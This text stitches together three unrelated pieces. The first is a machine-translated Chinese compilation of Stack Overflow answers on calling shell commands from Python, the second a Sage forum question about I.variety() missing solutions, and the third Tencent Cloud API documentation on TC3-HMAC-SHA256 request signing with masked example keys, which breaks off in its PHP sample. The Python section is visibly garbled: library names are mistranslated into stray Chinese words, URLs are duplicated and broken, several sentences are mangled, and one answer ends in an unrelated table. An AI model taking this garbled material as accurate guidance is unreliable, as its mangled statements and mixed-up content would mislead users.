True,则将通过shell执行指定的命令。 如果您主要使用Python来提供它在大多数系统shell上提供的增强控制流,并且仍然希望方便地访问其他shell功能,例如shell管道,文件名通配符,环境变量扩展以及扩展到用户家中,这将非常有用。目录。 但请注意,Python本身提供了许多类似shell的功能的实现(特别是glob,fnmatch,os.walk(),os.path.expandvars(),os.path.expanduser()和shutil)。
>>> import subprocess, shlex
>>> command = 'ls -l "/your/path/with spaces/"'
>>> call_params = shlex.split(command)
>>> print call_params
["ls", "-l", "/your/path/with spaces/"]
>>> subprocess.call(call_params)
我建议使用子进程模块而不是os.system,因为它为你做了shell转义,因此更加安全: http://docs.python.org/library/subprocess.html ://docs.python.org/library/subprocess.html
subprocess.call(['ping', 'localhost'])
我通常使用:
import subprocess
p = subprocess.Popen('ls', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
print line,
retval = p.wait()
您可以使用管道中的stdout数据自由地执行所需操作。 实际上,您可以简单地省略这些参数( stdout=和stderr= ),它的行为类似于os.system() 。
我非常喜欢shell_command因为它简单。 它建立在子进程模块之上。
以下是文档中的示例:
>>> from shell_command import shell_call
>>> shell_call("ls *.py")
setup.py shell_command.py test_shell_command.py
0
>>> shell_call("ls -l *.py")
-rw-r--r-- 1 ncoghlan ncoghlan 391 2011-12-11 12:07 setup.py
-rw-r--r-- 1 ncoghlan ncoghlan 7855 2011-12-11 16:16 shell_command.py
-rwxr-xr-x 1 ncoghlan ncoghlan 8463 2011-12-11 16:17 test_shell_command.py
0
有关将子进程与调用进程分离的一些提示(在后台启动子进程)。
假设您想从CGI脚本启动一个长任务,即子进程应该比CGI脚本执行过程更长寿。
子流程模块docs的经典示例是:
import subprocess
import sys
# some code here
pid = subprocess.Popen([sys.executable, "longtask.py"]) # call subprocess
# some more code here
这里的想法是你不想在“调用子进程”行中等待,直到longtask.py完成。 但目前尚不清楚在这个例子中“更多代码”这一行之后会发生什么。
我的目标平台是freebsd,但是开发是在windows上进行的,所以我首先在windows上遇到了问题。
在Windows(win xp)上,父进程将不会完成,直到longtask.py完成其工作。 这不是你想要的CGI脚本。 问题不是Python特有的,在PHP社区中问题是一样的。
解决方案是将DETACHED_PROCESS 流程创建标志传递给win API中的底层CreateProcess函数。 如果你碰巧安装了pywin32,你可以从win32process模块导入标志,否则你应该自己定义:
DETACHED_PROCESS = 0x00000008
pid = subprocess.Popen([sys.executable, "longtask.py"],
creationflags=DETACHED_PROCESS).pid
/ * UPD 2015.10.27 @eryksun在下面的评论中指出,语义正确的标志是CREATE_NEW_CONSOLE(0x00000010)* /
在freebsd上我们还有另一个问题:父进程完成后,它也会完成子进程。 这也不是你想要的CGI脚本。 一些实验表明问题似乎在于共享sys.stdout。 工作解决方案如下:
pid = subprocess.Popen([sys.executable, "longtask.py"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
我没有检查其他平台上的代码,也不知道freebsd上的行为原因。 如果有人知道,请分享您的想法。 谷歌搜索在Python中启动后台进程尚未解决任何问题。
有许多不同的库允许您使用Python调用外部命令。 对于每个库,我已经给出了描述并显示了调用外部命令的示例。 我用作示例的命令是ls -l (列出所有文件)。 如果您想了解有关我列出的任何库的更多信息,并链接每个库的文档。
资料来源:
子流程: https://docs.python.org/3.5/library/subprocess.html : https://docs.python.org/3.5/library/subprocess.html
shlex: https://docs.python.org/3/library/shlex.html ://docs.python.org/3/library/shlex.html
os: https://docs.python.org/3.5/library/os.html : https://docs.python.org/3.5/library/os.html
sh: https://amoffat.github.io/sh/ : https://amoffat.github.io/sh/
plumbum: https://plumbum.readthedocs.io/en/latest/ : https://plumbum.readthedocs.io/en/latest/
pexpect: https://pexpect.readthedocs.io/en/stable/ ://pexpect.readthedocs.io/en/stable/
面料: http://www.fabfile.org/ : http://www.fabfile.org/
特使: https://github.com/kennethreitz/envoy : https://github.com/kennethreitz/envoy
命令: https://docs.python.org/2/library/commands.html : https://docs.python.org/2/library/commands.html
这些都是库:
希望这可以帮助您决定使用哪个库:)
子
子进程允许您调用外部命令并将它们连接到它们的输入/输出/错误管道(stdin,stdout和stderr)。 子进程是运行命令的默认选择,但有时其他模块更好。
subprocess.run(["ls", "-l"]) # Run command
subprocess.run(["ls", "-l"], stdout=subprocess.PIPE) # This will run the command and return any output
subprocess.run(shlex.split("ls -l")) # You can also use the shlex library to split the command
口
os用于“依赖于操作系统的功能”。 它也可以用于使用os.system和os.popen调用外部命令(注意:还有一个os.popen )。 os将始终运行shell,对于不需要或不知道如何使用subprocess.run人来说,它是一个简单的替代方案。
os.system("ls -l") # run command
os.popen("ls -l").read() # This will run the command and return any output
SH
sh是一个子进程接口,它允许您像调用函数一样调用程序。 如果要多次运行命令,这非常有用。
sh.ls("-l") # Run command normally
ls_cmd = sh.Command("ls") # Save command as a variable
ls_cmd() # Run command as if it were a function
铅
plumbum是一个用于“类似脚本”的Python程序的库。 您可以像sh一样调用函数之类的程序。 如果要运行没有shell的管道,Plumbum很有用。
ls_cmd = plumbum.local("ls -l") # get command
ls_cmd() # run command
Pexpect的
pexpect允许您生成子应用程序,控制它们并在其输出中查找模式。 对于期望在Unix上使用tty的命令,这是替代子进程的更好的替代方法。
pexpect.run("ls -l") # Run command as normal
child = pexpect.spawn('scp foo [email protected]:.') # Spawns child application
child.expect('Password:') # When this is the output
child.sendline('mypassword')
布
fabric是一个Python 2.5和2.7库。 它允许您执行本地和远程shell命令。 Fabric是在安全shell(SSH)中运行命令的简单替代方法
fabric.operations.local('ls -l') # Run command as normal
fabric.operations.local('ls -l', capture = True) # Run command and receive output
使者
特使被称为“人类的子过程”。 它用作subprocess模块周围的便利包装器。
r = envoy.run("ls -l") # Run command
r.std_out # get output
命令
commands包含os.popen包装函数,但它已从Python 3中删除,因为subprocess os.popen是一个更好的选择。
该编辑基于JF Sebastian的评论。
检查“pexpect”Python库。
它允许交互式控制外部程序/命令,甚至ssh,ftp,telnet等。您只需键入以下内容:
child = pexpect.spawn('ftp 192.168.0.24')
child.expect('(?i)name .*: ')
child.sendline('anonymous')
child.expect('(?i)password')
没有结果的输出:
import os
os.system("your command here")
输出结果:
import commands
commands.getoutput("your command here")
or
commands.getstatusoutput("your command here")
这就是我运行命令的方式。 此代码包含您需要的所有内容
from subprocess import Popen, PIPE
cmd = "ls -l ~/"
p = Popen(cmd , shell=True, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
print "Return code: ", p.returncode
print out.rstrip(), err.rstrip()
这里有另一个不同之处,前面没有提到过。
subprocess.Popen将<command>作为subprocess.Popen执行。 在我的例子中,我需要执行需要与另一个程序进行通信的文件<a> <b>。
我尝试了subprocess,执行成功了。 但是<b>无法与<a>通信。 当我从终端运行时,一切正常。
还有一个:(注意:kwrite的行为与其他应用程序不同。如果您使用Firefox尝试以下操作,结果将不同。)
如果你尝试os.system("kwrite") ,程序流程将冻结,直到用户关闭kwrite。 为了克服这个问题,我尝试了os.system(konsole -e kwrite) 。 这个时间程序继续流动,但kwrite成为控制台的子进程。
任何人都运行kwrite不是一个子进程(即在系统监视器中它必须出现在树的最左边)。
在Windows中你可以导入subprocess模块,并通过调用运行外部命令subprocess.Popen(),subprocess.Popen().communicate()并subprocess.Popen().wait()如下:
+--------------------------------------+------------+------+
| ID | Label | CIDR |
+--------------------------------------+------------+------+
| 431c9014-5b5d-4b51-a357-66020ffbb123 | test1 | None |
| 27a74fcd-37c0-4789-9414-9531b7e3f126 | External | None |
| 5a2712e9-70dc-4b0e-9281-17e02f4684c9 | management | None |
| 7aa697f5-0e60-4c15-b4cc-9cb659698512 | Internal | None |
+--------------------------------------+------------+------+
输出:
27a74fcd-37c0-4789-9414-9531b7e3f126
|
I.variety() : missing solution values
Hi there!
The following code:
sage: R.<x1,x2,x3,x4,x5> = PolynomialRing(RR,5,order='lex')
sage: f1=x1+x2+x3+x4+x5
sage: f2=x1*x2+x2*x3+x3*x4+x4*x5+x1*x5
sage: f3=x1*x2*x3+x2*x3*x4+x3*x4*x5+x4*x5*x1+x5*x1*x2
sage: f4=x1*x2*x3*x4+x2*x3*x4*x5+x3*x4*x5*x1+x4*x5*x1*x2+x5*x1*x2*x3
sage: f5=x1*x2*x3*x4*x5-1
sage: I = Ideal(f1,f2,f3,f4,f5)
sage: I.variety()
produces
verbose 0 (2403: multi_polynomial_ideal.py, variety) Warning: falling back to very slow toy implementation.
[{x5: -2.61803398874989}, {x5: -0.381966011250105}, {x5: 1.00000000000000}]
which seems to be missing a large number of solution values, and only producing values for x5 even in those solutions in reports on, for some reason. A similar problem occurs if I solve over CC rather than RR (but involves a lot more text, so this seemed nicer to copy/paste).
If I change the order from lex to degrevlex, I.variety() fails with the following error message:
verbose 0 (2403: multi_polynomial_ideal.py, variety) Warning: falling back to very slow toy implementation.
---------------------------------------------------------------------------
NotImplementedError Traceback (most recent call last)
<ipython-input-479-cb6d916bc8b3> in <module>()
----> 1 I.variety()
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/multi_polynomial_ideal.pyc in __call__(self, *args, **kwds)
603 if not R.base_ring().is_field():
604 raise ValueError("Coefficient ring must be a field for function '%s'."%(self.f.__name__))
--> 605 return self.f(self._instance, *args, **kwds)
606
607 require_field = RequireField
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/multi_polynomial_ideal.pyc in variety(self, ring)
2667 if self.ring().term_order().is_global():
2668 verbose("Warning: falling back to very slow toy implementation.", level=0)
-> 2669 T = toy_variety.triangular_factorization(self.groebner_basis())
2670 else:
2671 raise TypeError("Local/unknown orderings not supported by 'toy_buchberger' implementation.")
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/toy_variety.pyc in triangular_factorization(B, n)
279 # recursively build the family,
280 # looping through the factors of p
--> 281 for (q,a) in p.factor():
282 # Construct an analog to I in (R.quotient(R.ideal(q)))[x_0,x_1,...x_{n-1}]
283 I = R.ideal([each.reduce([q]) for each in G])
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/multi_polynomial_element.pyc in factor(self, proof)
1662 raise NotImplementedError("Factorization of multivariate polynomials over prime fields with characteristic > 2^29 is not implemented.")
1663 if proof:
-> 1664 raise NotImplementedError("proof = True factorization not implemented. Call factor with proof=False.")
1665
1666 R._singular_().set_ring()
which is kind've mystifying, since we're working over either RR or CC, both of which have characteristic 0, and neither of which is a prime field. I thought maybe this is related to I.variety()'s odd behavior under lex order somehow, though, so it'd be worth including here.
I know this system has 10 real solutions (it's an example from HOM4PS2's documentation, and ...
|
TencentCloud API authenticates every single request, i.e., the request must be signed using the security credentials in the designated steps. Each request has to contain the signature information (Signature) in the common request parameters and be sent in the specified way and format.
The security credential used in this document is a key, which includes a SecretId and a SecretKey. Each user can have up to two pairs of keys.
You can apply for the security credentials through the following steps:
TencentCloud API comes with SDKs for seven commonly used programming languages, including Python, Java, PHP, Go, NodeJS and .NET. In addition, it provides API Explorer which enables online call, signature verification, and SDK code generation. If you have any troubles calculating a signature, consult these resources.
Compatible with the previous HmacSHA1 and HmacSHA256 signature algorithms, the TC3-HMAC-SHA256 signature algorithm is more secure and supports larger requests and JSON format with better performance. We recommend using TC3-HMAC-SHA256 to calculate the signature.
TencentCloud API supports both GET and POST requests. For the GET method, only the Content-Type: application/x-www-form-urlencoded protocol format is supported. For the POST method, two protocol formats, Content-Type: application/json and Content-Type: multipart/form-data, are supported. The JSON format is supported by default for all business APIs, and the multipart format is supported only for specific business APIs. In this case, the API cannot be called in JSON format. See the specific business API documentation for more information. The POST method is recommended, as there is no difference in the results of both the methods, but the GET method only supports request packets up to 32 KB.
The following uses querying the list of CVM instances in the Guangzhou region as an example to describe the steps of signature splicing. We chose this API because:
In the example, we try to choose common parameters and API parameters that are prone to mistakes. When you actually call an API, please use parameters based on the actual conditions. The parameters vary by API. Do not copy the parameters and values in this example.
Assuming that your SecretId and SecretKey are AKIDz8krbsJ5yKBZQpn74WFkmLPx3******* and Gu5t9xGARNpq86cd98joQYCN3*******, respectively, if you want to view the status of the instance in the Guangzhou region whose CVM instance name is "unnamed" and have only one data entry returned, then the request may be:
curl -X POST https://cvm.tencentcloudapi.com \
-H "Authorization: TC3-HMAC-SHA256 Credential=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******/2019-02-25/cvm/tc3_request, SignedHeaders=content-type;host, Signature=c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff" \
-H "Content-Type: application/json; charset=utf-8" \
-H "Host: cvm.tencentcloudapi.com" \
-H "X-TC-Action: DescribeInstances" \
-H "X-TC-Timestamp: 1551113065" \
-H "X-TC-Version: 2017-03-12" \
-H "X-TC-Region: ap-guangzhou" \
-d '{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}'
The signature calculation process is explained in detail below.
Concatenate the canonical request string (CanonicalRequest) in the following pseudocode format:
CanonicalRequest =
HTTPRequestMethod + '\n' +
CanonicalURI + '\n' +
CanonicalQueryString + '\n' +
CanonicalHeaders + '\n' +
SignedHeaders + '\n' +
HashedRequestPayload
Field Name Explanation
HTTPRequestMethod HTTP request method (GET or POST). This example uses POST.
CanonicalURI URI parameter. Slash ("/") is used for API 3.0.
CanonicalQueryString The query string in the URL of the originating HTTP request. This is always an empty string “” for POST requests, and is the string after the question mark (?) for GET requests. For example: Limit=10&Offset=0。
Note:
CanonicalQueryString must be URL-encoded, referencing RFC3986, the UTF8 character set. We recommend using the programming language library. All special characters must be encoded and capitalized.
CanonicalHeaders Header information for signature calculation, including at least two headers of host and content-type. Custom headers can be added to participate in the signature process to improve the uniqueness and security of the request.
Concatenation rules:
content-type:application/json; charset=utf-8\nhost:cvm.tencentcloudapi.com\n.
Note:
content-type must match the actually sent content. In some programming languages, a charset value would be added even if it is not specified. In this case, the request sent is different from the one signed, and the sever will return an error indicating that signature verification failed.
SignedHeaders Header information for signature calculation, indicating which headers of the request participate in the signature process (they must each individually correspond to the headers in CanonicalHeaders). Content-type and host are required headers.
Concatenation rules:
content-type;host
HashedRequestPayload Hash value of the request payload (i.e., the body, such as {"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]} in this example). The pseudocode for calculation is Lowercase(HexEncode(Hash.SHA256(RequestPayload))) by SHA256 hashing the payload of the HTTP request, performing hexadecimal encoding, and finally converting the encoded string to lowercase letters. For GET requests, RequestPayload is always an empty string. The calculation result in this example is 99d58dfbc6745f6747f36bfca17dee5e6881dc0428a0a36f96199342bc5b4907.
According to the rules above, the CanonicalRequest string obtained in the example is as follows:
POST
/
content-type:application/json; charset=utf-8
host:cvm.tencentcloudapi.com
content-type;host
99d58dfbc6745f6747f36bfca17dee5e6881dc0428a0a36f96199342bc5b4907
The string to sign is concatenated as follows:
StringToSign =
Algorithm + \n +
RequestTimestamp + \n +
CredentialScope + \n +
HashedCanonicalRequest
Field Name Explanation
Algorithm Signature algorithm, which is currently always TC3-HMAC-SHA256.
RequestTimestamp Request timestamp, i.e., the value of the common parameter X-TC-Timestamp in the request header, which is the UNIX timestamp of the current time in seconds, such as 1551113065 in this example.
CredentialScope Scope of the credential in the format of Date/service/tc3_request, including the date, requested service and termination string (tc3_request). Date is a date in UTC time, whose value should match the UTC date converted by the common parameter X-TC-Timestamp;service is the product name, which should match the domain name of the product called. The calculation result in this example is 2019-02-25/cvm/tc3_request.
HashedCanonicalRequest Hash value of the CanonicalRequest string concatenated in the steps above. The pseudocode for calculation is Lowercase(HexEncode(Hash.SHA256(CanonicalRequest))). The calculation result in this example is 2815843035062fffda5fd6f2a44ea8a34818b0dc46f024b8b3786976a3adda7a.
Note:
Date has to be calculated from the timestamp "X-TC-Timestamp" and the time zone is UTC+0. If you add the system's local time zone information (such as UTC+8), calls can succeed both day and night but will definitely fail at 00:00. For example, if the timestamp is 1551113065 and the time in UTC+8 is 2019-02-26 00:44:25, the UTC+0 date in the calculated Date value should be 2019-02-25 instead of 2019-02-26.
Timestamp must be the same as your current system time, and your system time and standard time must be synced; if the difference between Timestamp and your current system time is larger than five minutes, the request will fail. If your system time is out of sync with the standard time for a while, the request will fail and return a signature expiration error.
According to the preceding rules, the string to be signed obtained in the example is as follows:
TC3-HMAC-SHA256
1551113065
2019-02-25/cvm/tc3_request
2815843035062fffda5fd6f2a44ea8a34818b0dc46f024b8b3786976a3adda7a
1) Calculate the derived signature key with the following pseudocode:
SecretKey = "Gu5t9xGARNpq86cd98joQYCN3*******"
SecretDate = HMAC_SHA256("TC3" + SecretKey, Date)
SecretService = HMAC_SHA256(SecretDate, Service)
SecretSigning = HMAC_SHA256(SecretService, "tc3_request")
Field Name Explanation
SecretKey The original SecretKey, i.e., Gu5t9xGARNpq86cd98joQYCN3*******.
Date The Date field information in Credential, such as 2019-02-25 in this example.
Service Value in the Service field in Credential, such as cvm in this example.
2) Calculate the signature with the following pseudocode:
Signature = HexEncode(HMAC_SHA256(SecretSigning, StringToSign))
The Authorization is concatenated as follows:
Authorization =
Algorithm + ' ' +
'Credential=' + SecretId + '/' + CredentialScope + ', ' +
'SignedHeaders=' + SignedHeaders + ', ' +
'Signature=' + Signature
Field Name Explanation
Algorithm Signature algorithm, which is always TC3-HMAC-SHA256.
SecretId The SecretId in the key pair, i.e., AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******.
CredentialScope Credential scope (see above). The calculation result in this example is 2019-02-25/cvm/tc3_request.
SignedHeaders Header information for signature calculation (see above), such as content-type;host in this example.
Signature Signature value. The calculation result in this example is c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff.
According to the rules above, the value obtained in the example is:
TC3-HMAC-SHA256 Credential=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******/2019-02-25/cvm/tc3_request, SignedHeaders=content-type;host, Signature=c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff
The following example shows a finished authorization header:
POST https://cvm.tencentcloudapi.com/
Authorization: TC3-HMAC-SHA256 Credential=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******/2019-02-25/cvm/tc3_request, SignedHeaders=content-type;host, Signature=c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff
Content-Type: application/json; charset=utf-8
Host: cvm.tencentcloudapi.com
X-TC-Action: DescribeInstances
X-TC-Version: 2017-03-12
X-TC-Timestamp: 1551113065
X-TC-Region: ap-guangzhou
{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}
When calling API 3.0, you are recommended to use the corresponding Tencent Cloud SDK 3.0 which encapsulates the signature process, enabling you to focus on only the specific APIs provided by the product when developing. See SDK Center for more information. Currently, the following programming languages are supported:
To further explain the signing process, we will use a programming language to implement the process described above. The request domain name, API and parameter values in the sample are used here. This goal of this example is only to provide additional clarification for the signature process, please see the SDK for actual usage.
The final output URL might be: https://cvm.tencentcloudapi.com/?Action=DescribeInstances&InstanceIds.0=ins-09dx96dg&Limit=20&Nonce=11886&Offset=0&Region=ap-guangzhou&SecretId=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******&Signature=EliP9YW3pW28FpsEdkXt%2F%2BWcGeI%3D&Timestamp=1465185768&Version=2017-03-12.
Note: The key in the example is fictitious, and the timestamp is not the current time of the system, so if this URL is opened in the browser or called using commands such as curl, an authentication error will be returned: Signature expired. In order to get a URL that can work properly, you need to replace the SecretId and SecretKey in the example with your real credentials and use the current time of the system as the Timestamp.
Note: In the example below, even if you use the same programming language, the order of the parameters in the URL may be different for each execution. However, the order does not matter, as long as all the parameters are included in the URL and the signature is calculated correctly.
Note: The following code is only applicable to API 3.0. It cannot be directly used in other signature processes. Even with an older API, signature calculation errors may occur due to the differences in details. Please refer to the corresponding documentation.
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.TimeZone;
import java.util.TreeMap;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
public class TencentCloudAPITC3Demo {
private final static Charset UTF8 = StandardCharsets.UTF_8;
private final static String SECRET_ID = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******";
private final static String SECRET_KEY = "Gu5t9xGARNpq86cd98joQYCN3*******";
private final static String CT_JSON = "application/json; charset=utf-8";
public static byte[] hmac256(byte[] key, String msg) throws Exception {
Mac mac = Mac.getInstance("HmacSHA256");
SecretKeySpec secretKeySpec = new SecretKeySpec(key, mac.getAlgorithm());
mac.init(secretKeySpec);
return mac.doFinal(msg.getBytes(UTF8));
}
public static String sha256Hex(String s) throws Exception {
MessageDigest md = MessageDigest.getInstance("SHA-256");
byte[] d = md.digest(s.getBytes(UTF8));
return DatatypeConverter.printHexBinary(d).toLowerCase();
}
public static void main(String[] args) throws Exception {
String service = "cvm";
String host = "cvm.tencentcloudapi.com";
String region = "ap-guangzhou";
String action = "DescribeInstances";
String version = "2017-03-12";
String algorithm = "TC3-HMAC-SHA256";
String timestamp = "1551113065";
//String timestamp = String.valueOf(System.currentTimeMillis() / 1000);
SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd");
// Pay attention to the time zone; otherwise, errors may occur
sdf.setTimeZone(TimeZone.getTimeZone("UTC"));
String date = sdf.format(new Date(Long.valueOf(timestamp + "000")));
// ************* Step 1: Concatenate the CanonicalRequest string *************
String httpRequestMethod = "POST";
String canonicalUri = "/";
String canonicalQueryString = "";
String canonicalHeaders = "content-type:application/json; charset=utf-8\n" + "host:" + host + "\n";
String signedHeaders = "content-type;host";
String payload = "{\"Limit\": 1, \"Filters\": [{\"Values\": [\"unnamed\"], \"Name\": \"instance-name\"}]}";
String hashedRequestPayload = sha256Hex(payload);
String canonicalRequest = httpRequestMethod + "\n" + canonicalUri + "\n" + canonicalQueryString + "\n"
+ canonicalHeaders + "\n" + signedHeaders + "\n" + hashedRequestPayload;
System.out.println(canonicalRequest);
// ************* Step 2: Concatenate the string to sign *************
String credentialScope = date + "/" + service + "/" + "tc3_request";
String hashedCanonicalRequest = sha256Hex(canonicalRequest);
String stringToSign = algorithm + "\n" + timestamp + "\n" + credentialScope + "\n" + hashedCanonicalRequest;
System.out.println(stringToSign);
// ************* Step 3: Calculate the signature *************
byte[] secretDate = hmac256(("TC3" + SECRET_KEY).getBytes(UTF8), date);
byte[] secretService = hmac256(secretDate, service);
byte[] secretSigning = hmac256(secretService, "tc3_request");
String signature = DatatypeConverter.printHexBinary(hmac256(secretSigning, stringToSign)).toLowerCase();
System.out.println(signature);
// ************* Step 4: Concatenate the Authorization *************
String authorization = algorithm + " " + "Credential=" + SECRET_ID + "/" + credentialScope + ", "
+ "SignedHeaders=" + signedHeaders + ", " + "Signature=" + signature;
System.out.println(authorization);
TreeMap<String, String> headers = new TreeMap<String, String>();
headers.put("Authorization", authorization);
headers.put("Content-Type", CT_JSON);
headers.put("Host", host);
headers.put("X-TC-Action", action);
headers.put("X-TC-Timestamp", timestamp);
headers.put("X-TC-Version", version);
headers.put("X-TC-Region", region);
StringBuilder sb = new StringBuilder();
sb.append("curl -X POST https://").append(host)
.append(" -H \"Authorization: ").append(authorization).append("\"")
.append(" -H \"Content-Type: application/json; charset=utf-8\"")
.append(" -H \"Host: ").append(host).append("\"")
.append(" -H \"X-TC-Action: ").append(action).append("\"")
.append(" -H \"X-TC-Timestamp: ").append(timestamp).append("\"")
.append(" -H \"X-TC-Version: ").append(version).append("\"")
.append(" -H \"X-TC-Region: ").append(region).append("\"")
.append(" -d '").append(payload).append("'");
System.out.println(sb.toString());
}
}
# -*- coding: utf-8 -*-
import hashlib, hmac, json, os, sys, time
from datetime import datetime
# Key Parameters
secret_id = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******"
secret_key = "Gu5t9xGARNpq86cd98joQYCN3*******"
service = "cvm"
host = "cvm.tencentcloudapi.com"
endpoint = "https://" + host
region = "ap-guangzhou"
action = "DescribeInstances"
version = "2017-03-12"
algorithm = "TC3-HMAC-SHA256"
#timestamp = int(time.time())
timestamp = 1551113065
date = datetime.utcfromtimestamp(timestamp).strftime("%Y-%m-%d")
params = {"Limit": 1, "Filters": [{"Name": "instance-name", "Values": ["unnamed"]}]}
# ************* Step 1: Concatenate the CanonicalRequest string *************
http_request_method = "POST"
canonical_uri = "/"
canonical_querystring = ""
ct = "application/json; charset=utf-8"
payload = json.dumps(params)
canonical_headers = "content-type:%s\nhost:%s\n" % (ct, host)
signed_headers = "content-type;host"
hashed_request_payload = hashlib.sha256(payload.encode("utf-8")).hexdigest()
canonical_request = (http_request_method + "\n" +
canonical_uri + "\n" +
canonical_querystring + "\n" +
canonical_headers + "\n" +
signed_headers + "\n" +
hashed_request_payload)
print(canonical_request)
# ************* Step 2: Concatenate the string to sign *************
credential_scope = date + "/" + service + "/" + "tc3_request"
hashed_canonical_request = hashlib.sha256(canonical_request.encode("utf-8")).hexdigest()
string_to_sign = (algorithm + "\n" +
str(timestamp) + "\n" +
credential_scope + "\n" +
hashed_canonical_request)
print(string_to_sign)
# ************* Step 3: Calculate the Signature *************
# Function for computing signature digest
def sign(key, msg):
return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()
secret_date = sign(("TC3" + secret_key).encode("utf-8"), date)
secret_service = sign(secret_date, service)
secret_signing = sign(secret_service, "tc3_request")
signature = hmac.new(secret_signing, string_to_sign.encode("utf-8"), hashlib.sha256).hexdigest()
print(signature)
# ************* Step 4: Concatenate the Authorization *************
authorization = (algorithm + " " +
"Credential=" + secret_id + "/" + credential_scope + ", " +
"SignedHeaders=" + signed_headers + ", " +
"Signature=" + signature)
print(authorization)
print('curl -X POST ' + endpoint
+ ' -H "Authorization: ' + authorization + '"'
+ ' -H "Content-Type: application/json; charset=utf-8"'
+ ' -H "Host: ' + host + '"'
+ ' -H "X-TC-Action: ' + action + '"'
+ ' -H "X-TC-Timestamp: ' + str(timestamp) + '"'
+ ' -H "X-TC-Version: ' + version + '"'
+ ' -H "X-TC-Region: ' + region + '"'
+ " -d '" + payload + "'")
package main
import (
"crypto/hmac"
"crypto/sha256"
"encoding/hex"
"fmt"
"time"
)
func sha256hex(s string) string {
b := sha256.Sum256([]byte(s))
return hex.EncodeToString(b[:])
}
func hmacsha256(s, key string) string {
hashed := hmac.New(sha256.New, []byte(key))
hashed.Write([]byte(s))
return string(hashed.Sum(nil))
}
func main() {
secretId := "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******"
secretKey := "Gu5t9xGARNpq86cd98joQYCN3*******"
host := "cvm.tencentcloudapi.com"
algorithm := "TC3-HMAC-SHA256"
service := "cvm"
version := "2017-03-12"
action := "DescribeInstances"
region := "ap-guangzhou"
//var timestamp int64 = time.Now().Unix()
var timestamp int64 = 1551113065
// step 1: build canonical request string
httpRequestMethod := "POST"
canonicalURI := "/"
canonicalQueryString := ""
canonicalHeaders := "content-type:application/json; charset=utf-8\n" + "host:" + host + "\n"
signedHeaders := "content-type;host"
payload := `{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}`
hashedRequestPayload := sha256hex(payload)
canonicalRequest := fmt.Sprintf("%s\n%s\n%s\n%s\n%s\n%s",
httpRequestMethod,
canonicalURI,
canonicalQueryString,
canonicalHeaders,
signedHeaders,
hashedRequestPayload)
fmt.Println(canonicalRequest)
// step 2: build string to sign
date := time.Unix(timestamp, 0).UTC().Format("2006-01-02")
credentialScope := fmt.Sprintf("%s/%s/tc3_request", date, service)
hashedCanonicalRequest := sha256hex(canonicalRequest)
string2sign := fmt.Sprintf("%s\n%d\n%s\n%s",
algorithm,
timestamp,
credentialScope,
hashedCanonicalRequest)
fmt.Println(string2sign)
// step 3: sign string
secretDate := hmacsha256(date, "TC3"+secretKey)
secretService := hmacsha256(service, secretDate)
secretSigning := hmacsha256("tc3_request", secretService)
signature := hex.EncodeToString([]byte(hmacsha256(string2sign, secretSigning)))
fmt.Println(signature)
// step 4: build authorization
authorization := fmt.Sprintf("%s Credential=%s/%s, SignedHeaders=%s, Signature=%s",
algorithm,
secretId,
credentialScope,
signedHeaders,
signature)
fmt.Println(authorization)
curl := fmt.Sprintf(`curl -X POST https://%s\
-H "Authorization: %s"\
-H "Content-Type: application/json; charset=utf-8"\
-H "Host: %s" -H "X-TC-Action: %s"\
-H "X-TC-Timestamp: %d"\
-H "X-TC-Version: %s"\
-H "X-TC-Region: %s"\
-d '%s'`, host, authorization, host, action, timestamp, version, region, payload)
fmt.Println(curl)
}
<?php
$secretId = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******";
$secretKey = "Gu5t9xGARNpq86cd98joQYCN3*******";
$host = "cvm.tencentcloudapi.com";
$service = "cvm";
$version = "2017-03-12";
$action = "DescribeInstances";
$region = "ap-guangzhou";
// $timestamp = time();
$timestamp = 1551113065;
$algorithm = "TC3-HMAC-SHA256";
// step 1: build canonical request string
$httpRequestMethod = "POST";
$canonicalUri = "/";
$canonicalQueryString = "";
$canonicalHeaders = "content-type:application/json; charset=utf-8\n"."host:".$host."\n";
$signedHeaders = "content-type;host";
$payload = '{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}';
$hashedRequestPayload = hash("SHA256", $payload);
$canonicalRequest = $httpRequestMethod."\n"
.$canonicalUri."\n"
.$canonicalQueryString."\n"
.$canonicalHeaders."\n"
.$signedHeaders."\n"
.$hashedRequestPayload;
echo $canonicalRequest.PHP_EOL;
// step 2: build string to sign
$date = gmdate("Y-m-d", $timestamp);
$credentialScope = $date."/".$service."/tc3_request";
$hashedCanonicalRequest = hash("SHA256", $canonicalRequest);
$stringToSign = $algorithm."\n"
.$timestamp."\n"
.$credentialScope."\n"
.$hashedCanonicalRequest;
echo $stringToSign.PHP_EOL;
// step 3: sign string
